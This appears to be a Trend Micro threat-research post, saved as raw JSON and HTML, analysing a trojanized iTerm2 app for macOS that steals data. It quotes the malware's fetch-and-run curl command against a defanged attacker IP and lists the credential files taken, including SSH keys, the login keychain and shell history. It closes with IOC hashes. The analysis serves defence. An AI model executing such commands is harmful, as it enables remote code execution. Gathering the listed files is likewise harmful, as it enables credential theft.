{"id":43144,"date":"2021-09-30T00:00:00","date_gmt":"2021-09-30T00:00:00","guid":{"rendered":"https:\/\/www.trendmicro.com\/en_us\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app.html"},"modified":"2021-09-30T00:00:00","modified_gmt":"2021-09-30T00:00:00","slug":"mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/mac-users-targeted-by-trojanized-iterm2-app-threats-analyst-threats-analyst\/","title":{"rendered":"Mac Users Targeted by Trojanized iTerm2 App Threats Analyst Threats Analyst"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20banner.jpg\"><!-- Begin mPulse library --><!-- END mPulse library --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width\"> <meta name=\"description\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\" content=\"malware,research,web,articles, news, reports\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2021-09-30\"> <meta property=\"article:tag\"> <meta property=\"article:section\" content=\"research\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app.html\"> <title>Mac Users Targeted by Trojanized iTerm2 App<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app.html\"><br \/>\n<meta property=\"og:title\" content=\"Mac Users Targeted by Trojanized iTerm2 App\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20banner.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Mac Users Targeted by Trojanized iTerm2 App\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20banner.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"49.721962616822\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layer *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"44499974\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.7329376854599\">\n<div class=\"article-details\" role=\"heading\" readability=\"38.93175074184\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__description\">We go into more detail about a fake version of the iTerm2 app that downloads and runs malware, detected by Trend Micro as TrojanSpy.Python.ZURU.A, which collects private data from a victim\u2019s machine.<\/p>\n<p class=\"article-details__author-by\">By: Steven Du, Luis Magisa <time class=\"article-details__date\">September 30, 2021<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"32.190476190476\">\n<div readability=\"15.201058201058\">\n<p>Earlier this month, <a href=\"https:\/\/zhuanlan.zhihu.com\/p\/408746101\" target=\"_blank\" rel=\"noopener\">a user on Chinese question-and-answer website Zhihu reported<\/a> that a search engine result for the keyword \u201ciTerm2\u201d led to a fake website called <i>item2.net<\/i> that mimics the legitimate <i>iterm2.com<\/i> (Figure 1). A fake version of the iTerm2 app, a macOS terminal emulator, can be downloaded from a link found in <i>iterm2.net<\/i>. When this app is executed, it downloads and runs <i>g.py<\/i>, a malicious Python script from 47[.]75[.]123[.]111. This malware, which Trend Micro has detected as TrojanSpy.Python.ZURU.A, collects private data from a victim\u2019s machine.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2001.png\" alt=\"Figure 1. The fraudulent website iterm2.net\"><figcaption>Figure 1. The fraudulent website iterm2.net<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"39.675763182239\">\n<div readability=\"25.470860314524\">\n<p>Objective-see previously <a href=\"https:\/\/objective-see.com\/blog\/blog_0x66.html\" target=\"_blank\" rel=\"noopener\">published a blog entry<\/a> about this malware, which analyzed how the threat actor repacks the iTerm2 app to load the malicious <i>libcrypto.2.dylib<\/i>. This, in turn, downloads and runs other components, including the aforementioned <i>g.py<\/i> script and a Mach-O file called \u201cGoogleUpdate\u201d that contains a Cobalt Strike beacon payload. This blog entry covers the malware\u2019s details.<\/p>\n<h2><span class=\"body-subhead-title\">The trojanized app<\/span><\/h2>\n<p>As of September 15, <i>iterm2.net<\/i> is still active. However, the malicious file is not hosted on this website directly. Instead, the website contains a link, <i>hxxp:\/\/www.kaidingle.com\/iTerm\/iTerm.dmg<\/i>, from which users are able to download a macOS disk image file (DMG) called <i>iTerm.dmg<\/i>. The user is redirected to this download URL for <i>iTerm.dmg<\/i> regardless of the app version the user selects to download from the fake website; the real <i>iterm2.com<\/i> website has different URLs and files for various versions. The files that are downloaded from the legitimate website come in a ZIP file format, as opposed to the DMG file from the fraudulent website, as shown in Figure 2.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2002-2.png\" alt=\"Figure 2. The file downloaded from the fake website (left) and the official website (right)\"><figcaption>Figure 2. The file downloaded from the fake website (left) and the official website (right)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>Comparing the folder structure of the DMG and ZIP files shows numerous differences between them:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">All the Mach-O files in the trojanized iTerm2 app were signed with an Apple Distribution certificate, as shown in Figure 3, whereas files in the legitimate iTerm2.app are code signed with a Developer ID Application certificate. According to Apple documentation, an Apple Distribution certificate is only used to sign an app before the developer delivers it to the App Store, so apps downloaded from the App Store generally don\u2019t have an Apple Distribution certificate.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2003.png\" alt=\"Figure 3. Trojanized iTerm2 app code signing\"><figcaption>Figure 3. Trojanized iTerm2 app code signing<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ul>\n<li><span class=\"rte-red-bullet\">The trojanized iTerm2 app contains a file called <i>libcrypto.2.dylib<\/i> (with a SHA-256 hash of 2c269ff4216dc6a14fd81ffe541994531b23a1d8e0fbd75b9316a9fa0e0d5fef) in its Frameworks folder, which does not exist in the legitimate version, as shown in Figure 4.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2004.png\" alt=\"Figure 4. The libcrypto.2.lib file added in the trojanized iTerm2 app\"><figcaption>Figure 4. The libcrypto.2.lib file added in the trojanized iTerm2 app<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ul>\n<li><span class=\"rte-red-bullet\">In the trojanized iTerm2 app, the main Mach-O file has an additional load command called <i>LC_LOAD_DYLIB<\/i> that loads the <i>libcrypto.2.dylib<\/i> file, shown in Figure 5.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2005.png\" alt=\"Figure 5. The load command LC_LOAD_DYLIB loads the file libcrypto.2.dylib\"><figcaption>Figure 5. The load command LC_LOAD_DYLIB loads the file libcrypto.2.dylib<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41\">\n<div class=\"responsive-table-wrap\" readability=\"27\">\n<p>According to Objective-see\u2019s blog post, the malicious codes contained in the <i>libcrypto.2.dylib<\/i> file are executed automatically when the victim runs the trojanized iTerm2 app. This is a clever method for repacking legitimate apps that we have not seen before.<\/p>\n<p>Once executed, the malware connects to its server and receives these instructions from it:<\/p>\n<ol>\n<li><i>&#8220;curl -sfo \/tmp\/g.py http:\/\/47[.]75[.]123[.]111\/g.py &amp;&amp; chmod 777 \/tmp\/g.py &amp;&amp; python \/tmp\/g.py &amp;&amp; curl -sfo \/tmp\/GoogleUpdate http:\/\/47[.]75[.]123[.]111\/GoogleUpdate &amp;&amp; chmod 777 \/tmp\/GoogleUpdate &amp;&amp; \/tmp\/GoogleUpdate&#8221;<\/i><\/li>\n<li>Download the <i>g.py<\/i>&nbsp;script to the folder <i>\/tmp\/g.py<\/i> and execute it<\/li>\n<li>Download \u201cGoogleUpdate\u201d&nbsp;to the folder <i>\/tmp\/GoogleUpdate<\/i> and execute it<\/li>\n<li>Collect data using the <i>g.py<\/i> script<\/li>\n<\/ol>\n<p>The Python script <i>g.py<\/i> collects the following system data and files from the victim\u2019s machine, which the script then sends to the server:<\/p>\n<ol>\n<li>Operating system information<\/li>\n<li>Username<\/li>\n<li>Installed applications<\/li>\n<li>Local IP address<\/li>\n<li>Copies of these files and folders:\n<ol>\n<li><i>~\/.bash_history&#8217;<\/i><\/li>\n<li><i>~\/.zsh_history<\/i><\/li>\n<li><i>~\/.gitConfig<\/i><\/li>\n<li><i>\/etc\/hosts<\/i><\/li>\n<li><i>~\/.ssh<\/i><\/li>\n<li><i>~\/.zhHistory<\/i><\/li>\n<li><i>~\/Library\/Keychains\/Login.keychain-db<\/i><\/li>\n<li><i>~\/Library\/Application Support\/VanDyke\/SecureCRT\/Config\/<\/i><\/li>\n<li><i>~\/Library\/Application Support\/iTerm2\/SavedState\/<\/i><\/li>\n<\/ol>\n<\/li>\n<li>The contents of these directories:\n<ol>\n<li><i>~\/ &#8211; {current user home directory}<\/i><\/li>\n<li><i>~\/Desktop<\/i><\/li>\n<li><i>~\/Documents<\/i><\/li>\n<li><i>~\/Downloads<\/i><\/li>\n<li><i>\/Applications<\/i><\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<h2><span class=\"body-subhead-title\">Other trojanized apps and fake sites<\/span><\/h2>\n<p>Further analysis of the trojanized iTerm2 app\u2019s Apple Distribution certificate led us to find similar trojanized apps on VirusTotal (Table 1), all of which were trojanized using the same method.<\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<caption>Table 1. Other trojanized apps found on VirusTotal<\/caption>\n<tbody readability=\"7\">\n<tr>\n<td><b>File Name<\/b><\/td>\n<td><b>SHA-256 Hash<\/b><\/td>\n<td><b>Detection<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>iTerm.app.zip<\/i><\/td>\n<td>5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0<\/td>\n<td>TrojanSpy.MacOS.ZURU.A<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>SecureCRT.dmg<\/i><\/td>\n<td>ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132<\/td>\n<td>Trojan.MacOS.ZuRu.PFH<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>SecureCRT.dmg<\/i><\/td>\n<td>1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921<\/td>\n<td>Trojan.MacOS.ZuRu.PFH<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><i>Microsoft Remote Desktop.dmg<\/i><\/td>\n<td>5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259<\/td>\n<td>TrojanSpy.MacOS.ZURU.A<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>Navicat15_cn.dmg<\/i><\/td>\n<td>6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff<\/td>\n<td>TrojanSpy.MacOS.ZURU.A<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>Navicat15_cn.dmg<\/i><\/td>\n<td>91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e<\/td>\n<td>TrojanSpy.MacOS.ZURU.A<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Searching VirusTotal for the Secure Sockets Layer (SSL) thumbprint that <i>iterm2.net <\/i>used revealed several other fraudulent websites. As shown in Figure 6, all of these websites resolved to the same IP address, 43[.]129[.]218[.]115.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2006.png\" alt=\"Figure 6. Other fake websites found on VirusTotal\"><figcaption>Figure 6. Other fake websites found on VirusTotal<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>We were able to access one of these fake websites, <i>snailsvn.cn<\/i>, but the download link on its page was empty at that time, so it remains uncertain whether this website had been used to distribute a trojanized version of SnailSVN, an Apache Subversion (SVN) client for Mac OS X, in the wild (Figure 7). However, all of these domains were inaccessible at the time of writing.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2007.png\" alt=\"Figure 7. The fake SnailSVN website\"><figcaption>Figure 7. The fake SnailSVN website<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<h2><span class=\"body-subhead-title\">Download server<\/span><\/h2>\n<p>The server used for hosting the trojanized packages, <i>kaidingle[.]com<\/i>, was registered on September 7, and is currently still active. According to VirusTotal, apart from <i>iterm.dmg<\/i>, it also hosts other DMG files such as <i>SecureCTR.dmg<\/i> and <i>Navicat15_cn.dmg<\/i> (Figure 8). As of September 18, the latter two DMG files can still be downloaded from the server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2008.png\" alt=\"Figure 8. URLs relating with download server\"><figcaption>Figure 8. URLs relating with download server<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>Based on the server\u2019s information on WHOIS, a query and response protocol, there are four other domains under the same registrant (Figure 9). However, so far, none of these domains show any indication that they\u2019re related to any malware.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2009.png\" alt=\"Figure 9. Other domains from the same registrant\"><figcaption>Figure 9. Other domains from the same registrant<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<h2><span class=\"body-subhead-title\">Second-stage server<\/span><\/h2>\n<p>VirusTotal recorded multiple URLs related to a second-stage server under the IP address 47[.]75[.]123[.]111 \u2013 the same address as that of the malicious <i>g.py<\/i> script \u2013 from September 8 to 17, as shown in Figure 10.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2010.png\" alt=\"Figure 10. URLs under the second-stage server\"><figcaption>Figure 10. URLs under the second-stage server<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.06012884753\">\n<div class=\"responsive-table-wrap\" readability=\"17.490336435218\">\n<p>Besides the <i>g.py<\/i> script and \u201cGoogleUpdate\u201d components that are part of the trojanized iTerm app malware routine, the second-stage server also hosts four other Mach-O files that are used as post-penetration tools (Table 2).<\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<caption>Table 2. Other Mach-O files hosted in the second-stage server<\/caption>\n<tbody readability=\"7.5769230769231\">\n<tr>\n<td><b>File Name<\/b><\/td>\n<td><b>SHA-256 Hash<\/b><\/td>\n<td><b>Description\/Detection<\/b><\/td>\n<\/tr>\n<tr readability=\"4.7547169811321\">\n<td>la&nbsp;<\/td>\n<td>79ef23214c61228a03faea00a1859509ea3bf0247219d65ae6de335fde4061f5<\/td>\n<td readability=\"4.4044943820225\">\n<p>An open source intranet penetration scanner framework<\/p>\n<p><u>(<a href=\"https:\/\/github.com\/k8gege\/LadonGo\">https:\/\/github.com\/k8gege\/LadonGo<\/a>)<\/u><\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4.6216216216216\">\n<td>iox<\/td>\n<td>f005ea1db6da3f56e4c8b1135218b1da56363b077d3be7d218d8284444d7824f<\/td>\n<td readability=\"3.9873417721519\">\n<p>A tool for port forward and intranet proxy<\/p>\n<p>(<a href=\"https:\/\/github.com\/EddieIvan01\/iox\">https:\/\/github.com\/EddieIvan01\/iox<\/a>)<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"7.4223107569721\">\n<td>netscan-darwin-amd64<\/td>\n<td>d12ef7f6de48c09e84143e90fe4a4e7b1b3d10cee5cd721f7fdf61e62e08e749&nbsp;<\/td>\n<td readability=\"6.5705521472393\">\n<p>Netscan scans a network for ports that are open on an IP\/IP range, and IP addressess that are in use on that network<\/p>\n<p>(<a href=\"https:\/\/github.com\/jessfraz\/netscan\/releases\">https:\/\/github.com\/jessfraz\/netscan\/releases<\/a>)<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td>Host<\/td>\n<td>a83edc0eb5a2f1db62acfa60c666b5a5c53733233ce264702a16cb5220df9d4e<\/td>\n<td>Backdoor.MacOS.Wirenet.PFH<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Notably, the IP address of the second-stage server is similar to the one \u201cGoogleUpdate\u201d connects to, which is 47[.]75[.]96[.]198. Both of these IP addresses are hosted by Alibaba Hong Kong. As shown in Figure 11, the URLs under 47[.]75[.]96[.]198 were registered around the same time as those in the second-stage server, which suggests that these two servers may have been set up by same threat actor.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2011.png\" alt=\"Figure 11. URLs under the same server as \u201cGoogleUpdate\u201d\"><figcaption>Figure 11. URLs under the same server as \u201cGoogleUpdate\u201d<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<h2><span class=\"body-subhead-title\">Advertisement sites<\/span><\/h2>\n<p>As detailed in the aforementioned user report, the first item from the search engine results is under the subdomain <i>rjxz.jxhwst.top<\/i>. Searching for this address in Google generates two results that lead only to their cache (Figure 12), and as of this writing, their actual pages are already down.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2012.png\" alt=\"Figure 12. Google caches of the two fake sites\"><figcaption>Figure 12. Google caches of the two fake sites<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The first search result, called \u201cMicrosoft Remote Desktop,\u201d has an address of <i>hxxp:\/\/rjxz.jxhwst.top\/3<\/i>, but based on its cache (Figure 13) and source code (Figure 14), we found that it redirected visitors to a fake website, <i>hxxp:\/\/remotedesktop.vip<\/i>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2013.png\" alt=\"Figure 13. The cache of the fake \u201cMicrosoft Remote Desktop\u201d page\"><figcaption>Figure 13. The cache of the fake \u201cMicrosoft Remote Desktop\u201d page<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2014.png\" alt=\"Figure 14. The source code of the fake page\"><figcaption>Figure 14. The source code of the fake page<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>Upon checking its main page, we discovered that the second-level domain <i>jxhwst.top<\/i> belongs to an agriculture company north of China. Apart from the subdomain <i>rjxz.jxhwst.top<\/i>, this second-level domain has 44 other subdomains, almost all of which are used for advertisements that have no relation to the agriculture company (Figure 15). It is possible that the company rents out these subdomains to others for advertising purposes, but cannot prevent them from being used for illegal purposes. If this is the case, the threat actor rents the subdomain for malware distribution.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/i\/mac-users-targeted-by-trojanized-iterm2-app\/TrojanSpy.Python.ZURU.A%20-%20Figure%2015.png\" alt=\"Figure 15. The subdomains of the agriculture company\"><figcaption>Figure 15. The subdomains of the agriculture company<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.649159663866\">\n<div readability=\"12.843137254902\">\n<h2><span class=\"body-subhead-title\">Security recommendations<\/span><\/h2>\n<p>To protect systems from threats like these, end users should only download apps from official and legitimate marketplaces. They should be careful about the search results from search engines, and always double-check URLs to make sure these really point to the official sites. Mac users can consider multilayered security solutions such as <a href=\"https:\/\/www.trendmicro.com\/en_us\/forHome\/products\/antivirus-for-mac.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Antivirus for Mac\u00ae<\/a>, which provides enhanced anti-scam protection that flags and blocks scam websites that attempt to steal their personal data. They may also avail of Antivirus for Mac as part of <a href=\"https:\/\/www.trendmicro.com\/en_us\/forHome\/products\/maximum-security.html\" target=\"_blank\" rel=\"noopener\">Trend Micro Maximum Security<\/a>, a multi-platform solution that offers comprehensive security and multidevice protection against cyberthreats.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<h2><span class=\"body-subhead-title\">Indicators of Compromise (IOCs)<\/span><\/h2>\n<p><center><\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<tbody readability=\"18\">\n<tr>\n<td><b>File Name<\/b><\/td>\n<td><b>SHA-256 Hash<\/b><\/td>\n<td><b>Detection<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><i>SecureCRT.dmg<\/i><\/td>\n<td>1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>com.microsoft.rdc.macos<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>iTerm.app.zip<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>5f59ead37fa836c6329a7ba3edd4afc9a2c5fec61de4e0cdb8e8a41031ae4db0<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>Navicat15_cn.dmg<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>Navicat15_cn.dmg<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>91541cfc0474d6c06376460759517ae94f36fca74d5ab84cf5c23d98bd33939e<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>SecureCRT.dmg<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>ae0510032cd4699ef17de7ed1587918ffcd7ff7c9a77fc45f9d68effe2934132<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>iTerm.dmg<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>e5126f74d430ff075d6f7edcae0c95b81a5e389bf47e4c742618a042f378a3fa<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"157\" readability=\"5\">\n<p><i>Microsoft Remote Desktop.dmg<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>4e8287b61b0269e0d704c6d064cb584c1378e9b950539fea366ee304f695743f<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"157\">\n<p><i>libcrypto.2.dylib<\/i><\/p>\n<\/td>\n<td width=\"452\" readability=\"5\">\n<p>4aece9a7d73c1588ce9441af1df6856d8e788143cd9e53a2e9cf729e23877343<\/p>\n<\/td>\n<td width=\"15\" valign=\"bottom\">\n<p>TrojanSpy.MacOS.ZURU.A<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td 